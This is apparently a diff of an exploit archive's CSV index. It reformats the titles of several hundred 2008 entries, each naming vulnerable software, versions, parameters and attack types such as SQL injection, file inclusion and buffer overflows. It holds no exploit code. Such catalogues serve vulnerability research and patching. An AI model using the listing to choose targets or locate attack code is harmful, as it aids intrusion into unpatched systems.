6011,platforms/php/webapps/6011.txt,"contentnow 1.4.1 - (upload/XSS) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - (CMailCOM.dll) Remote SEH Overwrite Exploit",2008-07-06,Nine:Situations:Group,windows,remote,80 -6013,platforms/osx/remote/6013.pl,"Safari / Quicktime 7.3 RTSP Content-Type Remote BoF Exploit",2008-07-06,krafty,osx,remote,0 +6013,platforms/osx/remote/6013.pl,"Safari / Quicktime 7.3 - RTSP Content-Type Remote BoF Exploit",2008-07-06,krafty,osx,remote,0 6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - (idDirectory) Blind SQL Injection",2008-07-07,Hamtaro,php,webapps,0 6015,platforms/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps,0 6016,platforms/php/webapps/6016.pl,"fuzzylime CMS 3.01a - (file) Local File Inclusion Exploit",2008-07-07,Cod3rZ,php,webapps,0 6017,platforms/php/webapps/6017.pl,"Triton CMS Pro - (X-Forwarded-For) Blind SQL Injection",2008-07-07,girex,php,webapps,0 -6018,platforms/php/webapps/6018.pl,"Neutrino 0.8.4 Atomic Edition Remote Code Execution Exploit",2008-07-07,Ams,php,webapps,0 +6018,platforms/php/webapps/6018.pl,"Neutrino 0.8.4 Atomic Edition - Remote Code Execution Exploit",2008-07-07,Ams,php,webapps,0 6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - (idDirectory) Blind SQL Injection",2008-07-07,ka0x,php,webapps,0 6021,platforms/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6022,platforms/php/webapps/6022.txt,"Mole Group Real Estate Script 1.1 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 @@ -5691,7 +5691,7 @@ id,file,description,date,author,platform,type,port 6074,platforms/php/webapps/6074.txt,"Pluck 4.5.1 - (blogpost) Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0 6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a - XSS / SQL Injection",2008-07-15,StAkeR,php,webapps,0 6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusion",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0 -6077,platforms/windows/dos/6077.c,"WinRemotePC Full+Lite 2008 r.2server Denial of Service",2008-07-15,Shinnok,windows,dos,0 +6077,platforms/windows/dos/6077.c,"WinRemotePC Full+Lite 2008 r.2server - Denial of Service",2008-07-15,Shinnok,windows,dos,0 6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - (sourceFolder) Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0 6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - (arcmonth) SQL Injection",2008-07-15,K-159,php,webapps,0 6080,platforms/php/webapps/6080.txt,"php Help Agent 1.1 - (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 @@ -5714,7 +5714,7 @@ id,file,description,date,author,platform,type,port 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - (index.php page) SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 6099,platforms/php/webapps/6099.txt,"Siteframe - (folder.php id) SQL Injection",2008-07-18,n0ne,php,webapps,0 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow Exploit (Win32)",2008-07-18,Unohope,windows,remote,80 -6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Preauth Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 +6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Pre-Auth Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 @@ -5725,7 +5725,7 @@ id,file,description,date,author,platform,type,port 6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - (mojoClassified.cgi mojo) Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 6110,platforms/cgi/webapps/6110.pl,"MojoJobs - (mojoJobs.cgi mojo) Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 6111,platforms/cgi/webapps/6111.pl,"MojoAuto - (mojoAuto.cgi mojo) Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6112,platforms/php/webapps/6112.txt,"EZWebAlbum (dlfilename) Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0 +6112,platforms/php/webapps/6112.txt,"EZWebAlbum (dlfilename) - Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0 6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-21,ldma,php,webapps,0 6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - (pid) SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps,0 @@ -5883,7 +5883,7 @@ id,file,description,date,author,platform,type,port 6288,platforms/php/webapps/6288.txt,"easysite 2.3 - Multiple Vulnerabilities",2008-08-21,SirGod,php,webapps,0 6291,platforms/php/webapps/6291.txt,"noname script 1.1 - Multiple Vulnerabilities",2008-08-23,SirGod,php,webapps,0 6292,platforms/php/webapps/6292.txt,"onenews beta 2 - (XSS/hi/SQL) Multiple Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 -6293,platforms/multiple/dos/6293.txt,"VLC 0.8.6i Mms Protocol Handling Heap Overflow PoC",2008-08-23,g_,multiple,dos,0 +6293,platforms/multiple/dos/6293.txt,"VLC 0.8.6i - Mms Protocol Handling Heap Overflow PoC",2008-08-23,g_,multiple,dos,0 6294,platforms/php/webapps/6294.txt,"5 star review - (XSS/SQL) Multiple Vulnerabilities",2008-08-24,Mr.SQL,php,webapps,0 6295,platforms/php/webapps/6295.txt,"MiaCMS 4.6.5 - Multiple SQL Injection",2008-08-24,~!Dok_tOR!~,php,webapps,0 6296,platforms/php/webapps/6296.txt,"BtiTracker 1.4.7 / xbtit 2.0.542 - SQL Injection",2008-08-25,InATeam,php,webapps,0 @@ -5893,7 +5893,7 @@ id,file,description,date,author,platform,type,port 6301,platforms/php/webapps/6301.txt,"ezContents CMS 2.0.3 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a - Remote Buffer Overflow Exploit",2008-08-25,"Guido Landi",windows,remote,0 6303,platforms/php/webapps/6303.txt,"WebBoard 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,php,webapps,0 -6305,platforms/hardware/remote/6305.htm,"Belkin wireless G router + ADSL2 modem Auth Bypass Exploit",2008-08-25,noensr,hardware,remote,0 +6305,platforms/hardware/remote/6305.htm,"Belkin wireless G router + ADSL2 modem - Auth Bypass Exploit",2008-08-25,noensr,hardware,remote,0 6306,platforms/php/webapps/6306.pl,"GeekLog 1.5.0 - Remote Arbitrary File Upload Exploit",2008-08-25,t0pP8uZz,php,webapps,0 6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - (department) SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - (single.php) SQL Injection",2008-08-26,cOndemned,php,webapps,0 @@ -5940,7 +5940,7 @@ id,file,description,date,author,platform,type,port 6352,platforms/php/webapps/6352.txt,"CS-Cart 1.3.5 - (Auth Bypass) SQL Injection",2008-09-02,"GulfTech Security",php,webapps,0 6353,platforms/windows/dos/6353.txt,"Google Chrome Browser 0.2.149.27 - DoS",2008-09-03,"Rishi Narang",windows,dos,0 6354,platforms/php/webapps/6354.txt,"Spice Classifieds - (cat_path) SQL Injection",2008-09-03,InjEctOr5,php,webapps,0 -6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0 +6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 - Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0 6356,platforms/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0 6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - (upload/SQL/XSS) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0 6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - (fckeditor) Remote Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps,0 @@ -5955,7 +5955,7 @@ id,file,description,date,author,platform,type,port 6369,platforms/php/webapps/6369.py,"devalcms 1.4a - XSS / Remote Code Execution Exploit",2008-09-05,"Khashayar Fereidani",php,webapps,0 6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - (index.php id) Blind SQL Injection",2008-09-05,JosS,php,webapps,0 6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 -6372,platforms/windows/dos/6372.html,"Google Chrome Browser 0.2.149.27 A HREF Denial of Service",2008-09-05,Shinnok,windows,dos,0 +6372,platforms/windows/dos/6372.html,"Google Chrome Browser 0.2.149.27 - A HREF Denial of Service",2008-09-05,Shinnok,windows,dos,0 6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - (news_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 6374,platforms/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - (id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 6375,platforms/php/webapps/6375.txt,"Vastal I-Tech Share Zone - (id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 @@ -5967,8 +5967,8 @@ id,file,description,date,author,platform,type,port 6382,platforms/php/webapps/6382.txt,"Vastal I-Tech Cosmetics Zone - (cat_id) SQL Injection",2008-09-05,Stack,php,webapps,0 6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 - (idcat) SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0 6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - (tage) SQL Injection",2008-09-05,e.wiZz!,php,webapps,0 -6386,platforms/windows/dos/6386.html,"Google Chrome Browser 0.2.149.27 Inspect Element Denial of Service",2008-09-05,Metacortex,windows,dos,0 -6387,platforms/windows/remote/6387.rb,"CitectSCADA ODBC Server Remote Stack Buffer Overflow Exploit (Metasploit)",2008-09-05,"Kevin Finisterre",windows,remote,2022 +6386,platforms/windows/dos/6386.html,"Google Chrome Browser 0.2.149.27 - Inspect Element Denial of Service",2008-09-05,Metacortex,windows,dos,0 +6387,platforms/windows/remote/6387.rb,"CitectSCADA ODBC Server - Remote Stack Buffer Overflow Exploit (Metasploit)",2008-09-05,"Kevin Finisterre",windows,remote,2022 6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - (fage) SQL Injection",2008-09-06,ZoRLu,php,webapps,0 6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local .M3U File Stack Buffer Overflow Exploit",2008-09-06,"fl0 fl0w",windows,local,0 6390,platforms/php/webapps/6390.txt,"IntegraMOD 1.4.x - (Insecure Directory) Download Database",2008-09-06,TheJT,php,webapps,0 @@ -6033,7 +6033,7 @@ id,file,description,date,author,platform,type,port 6455,platforms/php/webapps/6455.txt,"Linkarity - (link.php) SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 -6458,platforms/windows/dos/6458.c,"The Personal FTP Server 6.0f RETR Denial of Service",2008-09-14,Shinnok,windows,dos,0 +6458,platforms/windows/dos/6458.c,"The Personal FTP Server 6.0f - RETR Denial of Service",2008-09-14,Shinnok,windows,dos,0 6459,platforms/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service",2008-09-14,wins.mallow,hardware,dos,0 6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite - SQL Injection",2008-09-14,~!Dok_tOR!~,php,webapps,0 6461,platforms/php/webapps/6461.txt,"Cpanel 11.x - (Fantastico) LFI (sec Bypass)",2008-09-14,joker_1,php,webapps,0 @@ -6051,12 +6051,12 @@ id,file,description,date,author,platform,type,port 6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - (INC) Remote File Inclusion",2008-09-17,ka0x,php,webapps,0 6474,platforms/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)",2008-09-17,"belay tows",windows,dos,0 6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 - (footer) Remote File Inclusion",2008-09-17,Piker,php,webapps,0 -6476,platforms/hardware/remote/6476.html,"Cisco Router HTTP Administration CSRF Command Execution Exploit",2008-09-17,"Jeremy Brown",hardware,remote,0 +6476,platforms/hardware/remote/6476.html,"Cisco Router - HTTP Administration CSRF Command Execution Exploit",2008-09-17,"Jeremy Brown",hardware,remote,0 6477,platforms/hardware/remote/6477.html,"Cisco Router - HTTP Administration CSRF Command Execution Exploit (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 6478,platforms/php/webapps/6478.txt,"Technote 7 - (shop_this_skin_path) Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0 6480,platforms/php/webapps/6480.txt,"x10media mp3 search engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps,0 6481,platforms/php/dos/6481.c,"Femitter FTP Server 1.03 - (RETR) Remote Denial of Service PoC",2008-09-17,LiquidWorm,php,dos,0 -6482,platforms/php/webapps/6482.txt,"addalink 4 Write Approved Links Remote",2008-09-17,Pepelux,php,webapps,0 +6482,platforms/php/webapps/6482.txt,"addalink 4 Beta - Write Approved Links Remote",2008-09-17,Pepelux,php,webapps,0 6483,platforms/php/webapps/6483.txt,"E-Php CMS - (article.php es_id) SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0 6485,platforms/php/webapps/6485.txt,"addalink 4 - (category_id) SQL Injection",2008-09-18,ka0x,php,webapps,0 6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - (random) SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0 @@ -6105,7 +6105,7 @@ id,file,description,date,author,platform,type,port 6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P - (comments.php) Blind SQL Injection",2008-09-22,Stack,php,webapps,0 6530,platforms/php/webapps/6530.txt,"OpenElec 3.01 - (form.php obj) Local File Inclusion",2008-09-22,dun,php,webapps,0 6531,platforms/php/webapps/6531.txt,"MyBlog 0.9.8 - Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps,0 -6532,platforms/hardware/remote/6532.py,"Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)",2008-09-22,Zigma,hardware,remote,0 +6532,platforms/hardware/remote/6532.py,"Sagem Routers F@ST - Remote CSRF Exploit (dhcp hostname attack)",2008-09-22,Zigma,hardware,remote,0 6533,platforms/php/webapps/6533.txt,"basebuilder 2.0.1 - (main.inc.php) Remote File Inclusion",2008-09-22,dun,php,webapps,0 6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - (list.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 6536,platforms/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 - Cookie SQL Injection",2008-09-22,-SmoG-,php,webapps,0 @@ -6126,7 +6126,7 @@ id,file,description,date,author,platform,type,port 6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion",2008-09-24,dun,php,webapps,0 6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - (docs.php doc) Local File Inclusion",2008-09-24,dun,php,webapps,0 6553,platforms/php/webapps/6553.txt,"PHPcounter 1.3.2 - (defs.php l) Local File Inclusion",2008-09-24,dun,php,webapps,0 -6554,platforms/windows/dos/6554.html,"Google Chrome Browser Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0 +6554,platforms/windows/dos/6554.html,"Google Chrome Browser - Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0 6555,platforms/php/webapps/6555.txt,"Jadu CMS for Government - (recruit_details.php) SQL Injection",2008-09-24,r45c4l,php,webapps,0 6556,platforms/php/webapps/6556.txt,"webcp 0.5.7 - (filelocation) Remote File Disclosure",2008-09-24,GoLd_M,php,webapps,0 6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0 @@ -6180,7 +6180,7 @@ id,file,description,date,author,platform,type,port 6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution",2008-09-27,dun,php,webapps,0 6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion (original find)",2008-09-27,JIKO,php,webapps,0 6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0 -6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0 +6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0 6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS - (Search) SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0 6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - (index.php name) SQL Injection",2008-09-28,StAkeR,php,webapps,0 6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0 @@ -6221,7 +6221,7 @@ id,file,description,date,author,platform,type,port 6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0 6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0 6650,platforms/php/webapps/6650.txt,"Link Trader - (ratelink.php lnkid) SQL Injection",2008-10-01,"Hussin X",php,webapps,0 -6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 CWD command Remote Buffer Overflow PoC",2008-10-02,"Julien Bedard",windows,dos,0 +6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow PoC",2008-10-02,"Julien Bedard",windows,dos,0 6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script - Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0 6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow PoC",2008-10-02,securfrog,windows,dos,0 @@ -6283,7 +6283,7 @@ id,file,description,date,author,platform,type,port 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - (news.php id) SQL Injection",2008-10-09,"Hussin X",php,webapps,0 6713,platforms/php/webapps/6713.txt,"ScriptsEz Mini Hosting Panel - (members.php) LFI",2008-10-09,JosS,php,webapps,0 6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL) User Credentials Disclosure Exploit",2008-10-09,gnix,php,webapps,0 -6715,platforms/php/webapps/6715.txt,"ScriptsEz Easy Image Downloader Local File Download",2008-10-09,JosS,php,webapps,0 +6715,platforms/php/webapps/6715.txt,"ScriptsEz Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0 6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - Proof of Concept (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0 @@ -6317,13 +6317,13 @@ id,file,description,date,author,platform,type,port 6747,platforms/php/webapps/6747.php,"WP Comment Remix 1.4.3 - SQL Injection",2008-10-14,g30rg3_x,php,webapps,0 6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - (index.php no) SQL Injection",2008-10-14,EcHoLL,php,webapps,0 6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0 -6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0 +6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0 6752,platforms/windows/dos/6752.pl,"Eserv 3.x - FTP Server (ABOR) Remote Stack Overflow PoC",2008-10-14,LiquidWorm,windows,dos,0 6753,platforms/windows/dos/6753.py,"Titan FTP server 6.26 build 630 - Remote Denial of Service",2008-10-14,dmnt,windows,dos,0 6754,platforms/php/webapps/6754.txt,"My PHP Dating - (success_story.php id) SQL Injection",2008-10-14,Hakxer,php,webapps,0 -6755,platforms/php/webapps/6755.php,"PhpWebGallery 1.7.2 Session Hijacking / Code Execution Exploit",2008-10-14,EgiX,php,webapps,0 -6756,platforms/windows/dos/6756.txt,"VLC 0.9.2 Media Player XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0 +6755,platforms/php/webapps/6755.php,"PhpWebGallery 1.7.2 - Session Hijacking / Code Execution Exploit",2008-10-14,EgiX,php,webapps,0 +6756,platforms/windows/dos/6756.txt,"VLC 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0 6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - afd.sys Privilege Escalation Exploit (K-plugin)",2008-10-15,"Ruben Santamarta ",windows,local,0 6758,platforms/php/webapps/6758.txt,"AstroSPACES - (id) SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0 6759,platforms/php/webapps/6759.txt,"mystats - (hits.php) Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0 @@ -6333,7 +6333,7 @@ id,file,description,date,author,platform,type,port 6763,platforms/php/webapps/6763.txt,"Mosaic Commerce - (category.php cid) SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0 6764,platforms/php/webapps/6764.php,"Mic_blog 0.0.3 - (SQL Injection/Privilege Escalation) Remote Exploit",2008-10-16,StAkeR,php,webapps,0 6765,platforms/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injection",2008-10-16,JosS,php,webapps,0 -6766,platforms/php/webapps/6766.txt,"PokerMax Poker League Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0 +6766,platforms/php/webapps/6766.txt,"PokerMax Poker League - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0 6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - (index.php post & doc) Local File Inclusion",2008-10-16,JosS,php,webapps,0 6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution Exploit",2008-10-16,EgiX,php,webapps,0 6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - (search.php) SQL Injection",2008-10-16,StAkeR,php,webapps,0 @@ -6367,11 +6367,11 @@ id,file,description,date,author,platform,type,port 6798,platforms/windows/local/6798.pl,"VLC Media Player - .TY File Stack Based Buffer Overflow Exploit",2008-10-21,"Guido Landi",windows,local,0 6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0 6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - sftp rename Remote Buffer Overflow PoC (Auth)",2008-10-22,"Jeremy Brown",windows,dos,0 -6801,platforms/windows/remote/6801.txt,"Opera 9.60 Stored Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0 +6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Stored Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0 6802,platforms/php/webapps/6802.txt,"Joomla Component Daily Message 1.0.3 - (id) SQL Injection",2008-10-22,H!tm@N,php,webapps,0 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0 -6804,platforms/windows/remote/6804.pl,"GoodTech SSH (SSH_FXP_OPEN) Remote Buffer Overflow Exploit",2008-10-22,r0ut3r,windows,remote,22 -6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 DNS TXT Record Parsing Bug Heap Overflow PoC",2008-10-22,"Dan Kaminsky",multiple,dos,0 +6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow Exploit",2008-10-22,r0ut3r,windows,remote,22 +6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow PoC",2008-10-22,"Dan Kaminsky",multiple,dos,0 6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (ajax.php) SQL Injection (Auth)",2008-10-22,Xianur0,php,webapps,0 6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 @@ -6397,7 +6397,7 @@ id,file,description,date,author,platform,type,port 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - (EditUrl.php url) SQL Injection",2008-10-24,yassine_enp,php,webapps,0 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary Shell Upload",2008-10-24,Dentrasi,php,webapps,0 6831,platforms/windows/local/6831.cpp,"TUGzip 3.00 archiver - (.zip) Local Buffer Overflow Exploit",2008-10-24,"fl0 fl0w",windows,local,0 -6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 Virgo Remote Format String Exploit PoC",2008-10-24,LiquidWorm,windows,dos,0 +6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String Exploit PoC",2008-10-24,LiquidWorm,windows,dos,0 6833,platforms/php/webapps/6833.txt,"phpdaily - (SQL/XSS/lfd) Multiple Vulnerabilities",2008-10-24,0xFFFFFF,php,webapps,0 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - (LIST) Remote Denial of Service",2008-10-24,"Alfons Luja",windows,dos,0 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 @@ -6405,7 +6405,7 @@ id,file,description,date,author,platform,type,port 6837,platforms/php/webapps/6837.txt,"Kasra CMS - (index.php) Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - (gotourl.php id) SQL Injection",2008-10-26,"Hussin X",php,webapps,0 -6840,platforms/windows/remote/6840.html,"PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 +6840,platforms/windows/remote/6840.html,"PowerTCP FTP module - Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution Exploit (MS08-067) (Universal)",2008-10-26,EMM,windows,remote,135 6842,platforms/php/webapps/6842.txt,"WordPress Media Holder - (mediaHolder.php id) SQL Injection",2008-10-26,boom3rang,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - (forum.php id) SQL Injection",2008-10-26,Hurley,php,webapps,0 @@ -6445,7 +6445,7 @@ id,file,description,date,author,platform,type,port 6877,platforms/php/webapps/6877.txt,"Pro Traffic One - (poll_results.php id) SQL Injection",2008-10-29,"Hussin X",php,webapps,0 6878,platforms/windows/remote/6878.html,"DjVu - ActiveX Control 3.0 ImageURL Property Overflow Exploit",2008-10-30,"Shahriyar Jalayeri",windows,remote,0 6879,platforms/php/webapps/6879.txt,"MyPHP Forum 3.0 - Edit Topics/Blind SQL Injection",2008-10-30,StAkeR,php,webapps,0 -6880,platforms/windows/remote/6880.html,"Opera 9.61 opera:historysearch Code Execution Exploit PoC",2008-10-30,"Aviv 